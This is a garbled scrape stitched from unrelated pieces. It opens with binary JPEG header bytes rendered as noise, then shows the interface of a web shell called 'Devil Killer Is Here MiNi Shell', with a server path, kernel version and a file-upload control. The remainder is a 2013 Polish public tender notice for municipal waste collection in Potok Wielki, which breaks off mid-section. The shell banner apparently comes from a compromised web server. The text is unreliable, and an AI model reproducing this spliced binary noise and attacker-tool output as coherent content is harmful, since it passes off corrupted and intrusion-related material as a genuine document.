JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130628/127427-N-2013.html

<p class="kh_header"><b>Potok Wielki: Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych, położonych na terenie gminy Potok Wielki</b><br>
<b>Numer ogłoszenia: 127427 - 2013; data zamieszczenia: 28.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Potok Wielki , Potok Wielki 117, 23-313 Potok Wielki, woj. lubelskie, tel. 015 8740204, faks 015 8740204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugpotokwielki.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych, położonych na terenie gminy Potok Wielki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Ogólna charakterystyka Gminy Potok Wielki w kontekście odbioru i zagospodarowania odpadów:

1.	Szacunkowe dane dotyczące ilości gospodarstw domowych i liczy ludności w zabudowie jednorodzinnej i wielorodzinnej, ilości miejsc do gromadzenia odpadów (altanki i miejsca ustawienia pojemników) zgodnie z załącznikiem nr 9 do SWIZ.          			
1)	Liczba gospodarstw w zabudowie jednorodzinnej - 1.122   			
2)	Liczba gospodarstw domowych dla zabudowy wielorodzinnej - 21
3)	Ok. 99 % nieruchomości zadeklarowało selektywną zbiórkę odpadów
4)	Liczba osób zamieszkujących na terenie gminy - około 4.100.

Uwaga!
Ilość nieruchomości i liczba ludności jest szacunkowa. Zamawiający zastrzega sobie prawo zmiany ilości nieruchomości, z których będą odbierane odpady komunalne oraz liczby ludności. Ich ilość może wzrosnąć lub zmaleć w czasie realizacji zamówienia w wyniku zasiedlania nowych budynków lub ich wyludnienia.

2.	Na terenie gminy jest 16 miejscowości: Popielarnia, Dąbrowica, Dąbrówka, Potok-Stany, Stany Nowe, Osinki, Potok-Stany Kolonia, Radwanówka, Potok Wielki, Kolonia Potok Wielki, Zarajec Potocki, Wola Potocka, Stawki, Potoczek, Maliniec, Osówek.
3.	Obszar Gminy Potok Wielki  wynosi 98,33 km2  - mapa z zaznaczonymi drogami gminnymi - załącznik nr 10 do SWIZ.
4.	Gmina Potok Wielki zgodnie z Planem gospodarki odpadami dla województwa lubelskiego 2017 (uchwała Nr XXIV/396/2012 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012 r.) należy do Regionu Południowo - Zachodniego.
5.	Odpady biodegradowalne i zielone właściciele nieruchomości w zabudowie jednorodzinnej i zagrodowej powinni kompostować na przydomowych kompostownikach.
6.	System odbioru odpadów nie obejmuje odpadów komunalnych pochodzących z działalności gospodarczej.

3. Przedmiot zamówienia
1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na odbieraniu  i zagospodarowaniu odpadów komunalnych z posesji zamieszkałych, położonych na terenie Gminy Potok Wielki do regionalnej instalacji przetwarzania odpadów określonej dla południowo - zachodniego regionu gospodarowania odpadami w Planie gospodarki odpadami dla województwa lubelskiego. Odbiór odpadów komunalnych będzie realizowany od  lipca 2013 r. do 31.12.2014 r.  
2.	Usługa obejmuje również zaopatrzenie nieruchomości w worki przeznaczone do selektywnej zbiórki odpadów komunalnych tj. do frakcji suchej, szkła.
3.	W ramach usługi Wykonawca wyposaży na czas trwania umowy nieruchomości zamieszkałe na terenie Gminy również w pojemniki do zbierania frakcji mokrej i odpadów zmieszanych w zabudowie jednorodzinnej oraz pojemniki do selektywnego zbierania odpadów komunalnych w zabudowie wielorodzinnej. tj. na frakcję suchą, szkło, i frakcję mokrą. 
4.	Za udostępnione  pojemniki i przekazane worki Wykonawca nie będzie pobierał opłat od     
    właścicieli nieruchomości. 
5.	Wykonawca będzie prowadził odbiór odpadów komunalnych z terenu nieruchomości z następującą częstotliwością:
1)	zmieszane odpady komunalne niesegregowane (odpady zmieszane): 
a)	w zabudowie jednorodzinnej - 1 raz  w miesiącu, 
b)	w zabudowie wielorodzinnej  - 1 raz w miesiącu. 
2)	odpady komunalne zbierane selektywnie (frakcja sucha , szkło i frakcja mokra): 
a)	w zabudowie jednorodzinnej - 1 raz w miesiącu,
b)	w zabudowie wielorodzinnej - 1 raz w miesiącu. 
3)    odpady wielkogabarytowe,  przeterminowane leki 
   i chemikalia, zużyte baterie i akumulatory, odpady elektryczne 
   i elektroniczne, odpady budowlane i rozbiórkowe oraz zużyte opony    
       samochodowe zbierane w ramach tzw. wystawki - 1 raz w roku.
6.	Szczegółowe dane dotyczące terminu odbioru w poszczególnych miejscowościach zostaną zawarte w harmonogramie, który Wykonawca przedstawi do zatwierdzenia 
w dniu podpisania umowy Zamawiającemu. W harmonogramie należy również określić termin odbierania odpadów wielkogabarytowych, przeterminowanych leków 
i chemikaliów, zużytych baterii i akumulatorów, odpadów elektrycznych 
i elektronicznych, odpadów budowlanych i rozbiórkowych oraz zużytych opon samochodowych. Odbiór ten należy zorganizować z częstotliwością 1 raz w roku 
w ramach tzw. wystawki. Zamawiający zastrzega jednocześnie, iż zmiana częstotliwości odbioru może nastąpić w przypadku zmiany zapisów Regulaminu utrzymania czystości  i porządku na terenie Gminy Potok Wielki. Po akceptacji harmonogramu przez Zamawiającego, Wykonawca przekaże go, w formie papierowej, właścicielom nieruchomości w czasie wyposażania ich w worki i pojemniki. Ponadto wykonawca umieści harmonogram odbioru na tablicy ogłoszeń poszczególnych sołectw w ciągu 7 dni od daty popisania umowy.
7.	Zmieszane odpady komunalne,  odpady selektywnie zebrane (frakcja sucha, szkło i frakcja mokra) oraz poszczególne odpady zebrane w trakcie tzw. wystawki winny być przekazywane w sposób nie pozwalający na zmieszanie poszczególnych frakcji do regionalnej instalacji przetwarzania odpadów zgodnie z obowiązującymi przepisami i Planem gospodarki odpadami dla województwa lubelskiego.
8.	Odbiór odpadów komunalnych następuje zgodnie z obowiązującym w czasie trwania umowy Regulaminem utrzymania czystości i porządku na terenie Gminy Potok Wielki (załącznik nr 12).
9.	Określa się następujący sposób odbioru odpadów, w zależności od rodzaju zabudowy: 
1)	Na terenie zabudowy wielorodzinnej obowiązywać będzie system pojemnikowy
(kontenerowy) zbiórki odpadów komunalnych, z altan i miejsc ustawienia pojemników.
a)	Zmieszane odpady komunalne (kod 20 03 01).		
Zmieszane odpady komunalne zbierane będą do pojemników o pojemności 1100 l ustawionych w dotychczas przeznaczonych do tego miejscach (altanki śmietnikowe i miejsca ustawienia pojemników). Wykonawca w ramach usługi zapewni właścicielom nieruchomości w/w pojemniki na odpady zmieszane. Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - 1 raz w miesiącu.
b)	Odpady komunalne zbierane selektywnie. 					
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do oddzielnych pojemników o pojemności 1100 l przeznaczonych na poszczególne frakcje tj. frakcję suchą, szkło i frakcję mokrą. Pojemniki te zapewnia Wykonawca w ramach przedmiotowej usługi. Ilość pojemników podano w ust. 11 pkt 4-5. Częstotliwość wywozu przez Wykonawcę odpadów zbieranych selektywnie - 1 raz w miesiącu w godzinach od 7:00 do 20:00 w dniach od poniedziałku do piątku.  
2)	Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo - workowy zbiórki odpadów komunalnych.
a)	Zmieszane odpady komunalne (kod 20 03 01).  				                                Zmieszane odpady komunalne odbierane będą z pojemników o pojemności  120 litrów z nieruchomości zamieszkałych. Wykonawca zapewni w/w pojemniki na odpady zmieszane w ramach umowy. Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - 1 raz w miesiącu  w godzinach od 7:00 do 20:00 w dniach od poniedziałku do piątku. 		  
b)	Odpady komunalne zbierane selektywnie.   		                     
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie odbywać się w systemie pojemnikowo - workowym. Poszczególne rodzaje odpadów poddawane segregacji winny być gromadzone w workach w kolorze żółtym - dla frakcji suchej oraz workach w kolorze zielonym - na szkło. Frakcja mokra będzie zbierana w pojemniki. Worki dla frakcji suchej i szkło zapewnia każdorazowo Wykonawca w ilości odpowiadającej liczbie wystawionych worków z odpadami. Częstotliwość wywozu przez Wykonawcę odpadów zbieranych selektywnie - 1 raz w miesiącu w godzinach od 7:00 do 20:00 w dniach od poniedziałku do piątku.   
10.	Charakterystyka pojemników i worków do zbiórki odpadów komunalnych które   Wykonawca dostarczy właścicielom nieruchomości w ramach umowy: 
1)	Charakterystyka worków: 								       
- materiał - folia polietylenowa LDPE,					
- pojemność - 120 litrów,               						
- kolor - żółty (worki na frakcję suchą), zielony (na szkło),				
- grubość - zapewniająca wytrzymałość, co najmniej 60 mikronów,   	
- nadruk - jednostronny, kolor nadruku kontrastujący z kolorem worka z nazwą   
Wykonawcy nr telefonu, napisem Gmina Potok Wielki oraz wskazaniem jakie odpady można umieszczać w danym worku.				        
2)	Charakterystyka pojemników które należy dostarczyć mieszkańcom w ramach umowy: 		
§	materiał:  tworzywo PE-HD (polietylen) lub blacha stalowa, 
§	pojemność: 120 litrów, 1.100 litrów,
§	kolor: - pojemniki dla zabudowy wielorodzinnej 1.100 l na odpady selektywnie zbierane frakcja sucha pojemnik w kolorze żółtym  oraz oznaczeniem dotyczącym zawartości, pojemnik na szkło w kolorze zielonym i oznaczeniem dotyczącym zawartości, pojemnik na odpady zmieszane (frakcję mokrą) w kolorze czarnym lub szarym lub zielonym.
- pojemnik 120 l na odpady zmieszane (frakcję mokrą) dla zabudowy jednorodzinnej w kolorze czarnym lub szarym lub zielonym,
- pojemniki muszą być szczelne, zamykane pokrywą, wyposażone w kółka do przemieszczania oraz uchwyty boczne. Pojemniki muszą posiadać konstrukcję umożliwiającą ich opróżnianie grzebieniowym lub widłowym lub hakowym mechanizmem załadowczym przez pojazdy przeznaczone do odbioru odpadów.
11.	Wykonawca w ramach zamówienia jest zobowiązany do dostarczenia i ustawienia na terenie nieruchomości pojemników i worków na odpady bez dodatkowej opłaty od właściciela nieruchomości Szacowana ilość pojemników i worków które należy dostarczyć:
1)	worki o pojemności 120 litrów w kolorze żółtym i zielonym - 41. 000 szt. 
2)	pojemniki na odpady zmieszane (frakcję mokrą) 120 l - 1.122 szt. 
3)	pojemniki na odpady zmieszane (frakcję mokrą) 1.100 l -  2 szt.
4)	pojemniki na frakcję suchą - 1.100 l - 2 szt.
5)	pojemniki na szkło - 1.100 l - 2 szt.

Uwaga: W dniu podpisania umowy Zamawiający dostarczy Wykonawcy wykaz gospodarstw domowych objętych zamówieniem oraz informację czy dane gospodarstwo domowe zadeklarowało segregowanie odpadów komunalnych stanowiący załącznik do niniejszej umowy. W/w wykaz zostanie sporządzony w wersji elektronicznej w formacie .xls. 
Wykaz będzie aktualizowany w ciągu 14 dni od zaistnienia zmian. Otrzymane dane posłużą Wykonawcy do przygotowania odpowiedniej ilości worków na odpady komunalne zbierane selektywnie  (frakcja sucha i szkło) oraz pojemników do zbierania odpadów zmieszanych i frakcji mokrej.
12.	Dopuszcza się aby Wykonawca zorganizował dwa pierwsze odbiory odpadów komunalnych z nieruchomości w następujący sposób:
1)	worki do selektywnej zbiórki odpadów dostarczone do mieszkańców mogą być bez nadruków. Ważne jest zachowanie kolorystyki dostosowanej do zawartości danego worka.
2)	wykonawca do czasu wyposażenia nieruchomości w zabudowie jednorodzinnej  w pojemniki do zbierania frakcji mokrej i odpadów zmieszanych dostarczy zastępczo na każdą posesję czarne worki o pojemności 120l bez nadruków o wytrzymałości określonej w ust. 10 pkt 1 w ilości 1 szt. na każdą posesję.
3)	Wykonawca będzie odbierał odpady z nieruchomości w pojemnikach i workach które posiadają mieszkańcy.

13.	Klasyfikacja rodzajów odpadów do poszczególnej frakcji odpadów komunalnych:
1)	Frakcja zmieszana (kod 20 03 01),	
						          
2)	Frakcja sucha: 
 
Kod odpadu	Nazwa odpadu	   
2001 01	papier i tektura	   
20 01 40	metale	   
20 01 39	tworzywa sztuczne	   
1501 01	opakowania z papieru i tektury	   
15 01 02	opakowania z tworzyw sztucznych	   
15 01 04	opakowania z metalu	   
1501 05	opakowania wielomaterialowe	   
15 01 06	zmieszane odpady opakowaniowe
	 
3)	Szkło: szkło (20 01 02), opakowania ze szkła (15 01 07)

4)	odpady zbierane  1 raz w roku w ramach tzw. wystawki bezpośrednio z nieruchomości:
 
Rodzaje odpadów	Kod	   
odpady wielkogabarytowe	20 03 07	   
rozpuszczalniki	20 01 13*	   
kwasy	20 01 14*	   
alkalia	2001 15*	   
odczynniki fotograficzne	2001 17	   
detergenty zawierające substancje niebezpieczne	20 01 29*	   
detergenty inne niż wymienione w 20 01 29	20 01 30	   
oleje i tłuszcze inne niż wymienione w 20 01 25	20 01 26*	   
farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne	20 01 27*	   
farby, tusze, farby drukarskie, kleje, lepiszcze i żywice iine niż wymienione w 20 01 27	20 01 08	   
środki ochrony roślin 1 i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy insektycydy)	20 01 19*	   
środki ochrony roślin inne niż wymienione w 20 01 19	20 01 80	   
lampy fluorescencyjne i inne odpady zawierające rtęć	200121*	   
leki cytotoksyczne i cytostatyczne	2001 31*	   
leki inne niż wymienione w 20 01 31	20 01 31	   
zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01	20 01 35*	   
zawierające niebezpieczne składniki	21 i 20 01 23	   
zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23	20 01 38	   
opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone (np. środkami ochrony roślin 1 i II klasy toksyczności - bardzo toksyczne i toksyczne)	15 01 10*	   
opakowania z metali zawierające niebezpieczne porowate elementy wzmocnienia konstrukcyjnego (np. azbest), łącznie z pustymi pojemnikami ciśnieniowymi	1501 11*	   
baterie alkaliczne (z wyłączeniem 16 06 03)	16 06 04	   
inne baterie i akumulatory	16 06 05	   
zużyte opony	1601 03	   
mineralne oleje silnikowe, przekładniowe i smarowe zawierające związki chlorowcoorganicznc	13 02 04*	   
mineralne oleje silnikowe, przekładniowe i smarowe niezawierające związków chlorowcoorganicznyeh	13 02 05*	   
syntetyczne oleje silnikowe, przekładniowe i smarowe	13 02 06*	   
oleje silnikowe, przekładniowe i smarowe łatwo ulegające biodegradacji	13 02 07*	   
inne oleje silnikowe, przekładniowe i smarowe	13 02 08*	 
5)	Frakcja mokra: (kod 20 03 01)- pozostałe odpady komunalne niewymienione w pkt. 2, 3 i 4. 

14.	1) Przewidywana ilość wytworzonych odpadów komunalnych, którą należy odebrać w terminie od lipca 2013 r. r. do 31.12.2014 r. to około 725 Mg. Szacowana ilość odnosi się łącznie do odpadów pochodzących z nieruchomości zamieszkałych i odpadów zbieranych 1 raz w roku w ramach tzw. wystawki.  Powyższe dane dotyczące wytwarzanych odpadów mogą ulec zmianie w wyniku zasiedlenia nowych budynków lub wymeldowania oraz w wyniku ograniczenia wytwarzania odpadów przez mieszkańców. Z tytułu zmniejszenia ilości odebranych odpadów Wykonawcy nie będą przysługiwały jakiekolwiek roszczenia. 
2)   Do wystawienia comiesięcznej faktury przez Wykonawcę będzie brana pod   
      uwagę rzeczywista masa odebranych i zagospodarowanych odpadów.

15.	Wykonawca jest zobowiązany posiadać sprzęt zapewniający prawidłowe wykonanie zamówienia, zgodnie z warunkami określonymi w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013, poz. 122) a w szczególności: 
a) posiadać co najmniej dwa pojazdy przystosowane do odbierania zmieszanych  odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej. 
b) trwale i czytelnie oznakować pojazdy w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne, 
c) posiadać na terenie bazy magazynowo - transportowej urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania - urządzenia należy utrzymywać we właściwym stanie technicznym i sanitarnym, 
d) aby pojazdy były zarejestrowane i dopuszczone do ruchu oraz posiadały aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym, 
e) aby konstrukcja pojazdów zabezpieczała przed niekontrolowanym wydostaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu, 
g) aby konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady, 
h) wyposażyć pojazdy w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników, 
i) wyposażyć pojazdy w systemy:
- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
- czujników zapisujących dane o miejscach wyładunku odpadów - umożliwiający weryfikację tych danych,
j) dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych. 

16.	Obowiązki Wykonawcy przed rozpoczęciem i w trakcie trwania realizacji   zamówienia: 	                   								                    
1)	Wykonawca w ciągu 21 dni od daty podpisania umowy  ma obowiązek wyposażenia wszystkich nieruchomości, z których będzie odbierał odpady komunalne w niezbędne worki. 
2)	Pojemniki do zbierania odpadów w zabudowie wielorodzinnej o pojemności 1.100 l zostaną dostarczone w ciągu 21 dni daty podpisania umowy.
3)	 Wyposażenie nieruchomości w zabudowie jednorodzinnej  w pojemniki na frakcję mokrą i odpady zmieszane nastąpi najpóźniej w ciągu 60 dni od daty podpisania umowy.
4)	Wykonawca w dniu podpisania umowy otrzyma wykaz nieruchomości z ilością pojemników i worków jakie należy dostarczyć właścicielom poszczególnych nieruchomości. Posesje na których zadeklarowano zbieranie odpadów zmieszanych zostaną wyposażone tylko w pojemnik do odbioru odpadów zmieszanych. 
5)	Jeśli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy pojemników, Wykonawca w trakcie realizacji zamówienia zobowiązany będzie do naprawienia pojemników lub dodatkowego dostarczenia pojemników na swój koszt,
6)	W trakcie realizacji zamówienia Wykonawca będzie cyklicznie wyposażał właścicieli nieruchomości zamieszkałych w zabudowie jednorodzinnej w nowe worki na frakcję suchą i szkło  w odpowiedniej ilości, zgodnie z harmonogramem odbioru odpadów z poszczególnych nieruchomości, umożliwiając w sposób prawidłowy gromadzenie odpadów segregowanych przez właścicieli nieruchomości i sprawne funkcjonowanie systemu w gminie Potok Wielki. Przy czym ilość pozostawionych nowych worków do selektywnej zbiórki powinna odpowiadać minimum ilości i rodzajowi worków odebranych z danej nieruchomości. 
7)	W trakcie realizacji umowy Wykonawca zobowiązany będzie do wyposażenia nieruchomości w odpowiednie pojemniki zgodnie ze zgłoszeniem Zamawiającego. Dostarczenie i ustawienie pojemników na teren wskazanych nieruchomości nastąpi w ciągu 7 dni roboczych od dnia zgłoszenia przez Zamawiającego. Dotyczy to sytuacji pojawienia się nowych nieruchomości jeżeli pojawią się w trakcie realizacji zamówienia.
8)	Wykonawca jest zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach i przekazywania kopii dokumentacji Zamawiającemu.
9)	Wykonawca odpowiada za informowanie o zasadach i terminach odbierania poszczególnych rodzajów odpadów i dystrybucję innych dokumentów związanych 
z systemem gospodarki odpadami komunalnymi w gminie Potok Wielki, o ile nie wymagają one potwierdzenia odbioru. 
10)	Obowiązkiem Wykonawcy będzie utrzymanie w należytym porządku miejsca wokół pojemników, a jeżeli zajdzie taka potrzeba zabranie dostawionych przy pojemnikach worków z niesegregowanymi lub segregowanymi odpadami komunalnymi, jak również przedstawienie Zamawiającemu (jeden raz w miesiącu) sprawozdania z miejsc odbioru tego rodzaju worków (adres i ilość dostawionych worków), potrzebnego do przeprowadzenia kontroli ilości osób zamieszkałych na danej nieruchomości. 
11)	W przypadku zgłoszenia nieodebrania odpadów komunalnych w terminie wskazanym 
w harmonogramie bądź innego przypadku niewykonania obowiązków wynikających 
z umowy, w szczególności niedostarczenia worków lub nie zapewnienia właściwego stanu sanitarnego i  porządkowego miejsc zbierania odpadów, strony zgodnie ustalają, że przypadki te zostaną rozpatrzone w ramach postępowania reklamacyjnego. Wykonawca jest zobowiązany do niezwłocznego rozpatrzenia reklamacji, nie później jednak, niż w ciągu 24 godzin od otrzymania od Zamawiającego zawiadomienia telefonicznie, faksem. Informację o sposobie rozpatrzenia reklamacji należy niezwłocznie przekazać Zamawiającemu faksem na numer (15) 8740 204.
12)	Za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów, odpowiedzialność ponosi Wykonawca. 
13)	Wszystkie odpady objęte zamówieniem z terenu gminy Potok Wielki Wykonawca zobowiązany jest zagospodarować zgodnie z obowiązującymi przepisami prawnymi a w szczególności:  
 - ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach   
   (Dz.U. z  2012r. poz. 391 ze zm.), wraz z przepisami wykonawczymi, 
- ustawą z dnia 14 grudnia 2012r. o odpadach ( Dz.U. z 2013 r. poz. 21) wraz z  
  przepisami wykonawczymi, 
- ustawą z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (Dz. U. z 2008r. Nr 25  
  poz. 150 z poźn. zm.) wraz z przepisami wykonawczymi, 
- Planem gospodarki odpadami województwa lubelskiego 2017 (uchwała Nr  XXIV/397/2012 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012r.), 
- uchwałą w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie gminy Potok Wielki (uchwała nr XXII/119/2013 Rady Gminy Potok Wielki z dnia 30.01.2013r.)  ze zmianami.
14)	Wykonawca jest zobowiązany do wykonywania kontroli segregacji odpadów prowadzonej przez właścicieli nieruchomości i informowania Zamawiającego o każdym fakcie stwierdzenia naruszenia zasad segregacji, pisemnie w terminie 3 dni od momentu zaistnienia. Do informacji Wykonawca zobowiązany jest dołączyć dokumentację fotograficzną oraz protokół dokumentujący zdarzenie. Dokumenty powinny jednoznacznie wskazywać datę i godzinę stwierdzenia naruszenia oraz adres nieruchomości, której ono dotyczy. Zamawiający zastrzega sobie prawo do udziału w kontroli właścicieli nieruchomości prowadzonej przez Wykonawcę. Uzgodnienia w tym zakresie dokonywane będą na bieżąco.
15)	Wykonawca nie może odbierać i transportować odpadów komunalnych zleconych przez Zamawiającego wspólnie z odpadami z innych gmin, a także nie mieszać selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi, odbieranymi od właścicieli nieruchomości. Stwierdzenie takiego faktu spowoduje odstąpienie od umowy i wykreślenie z rejestru działalności regulowanej.

17.	Obowiązki Wykonawcy w zakresie prowadzenia dokumentacji związanej z działalnością objętą zamówieniem:						                         
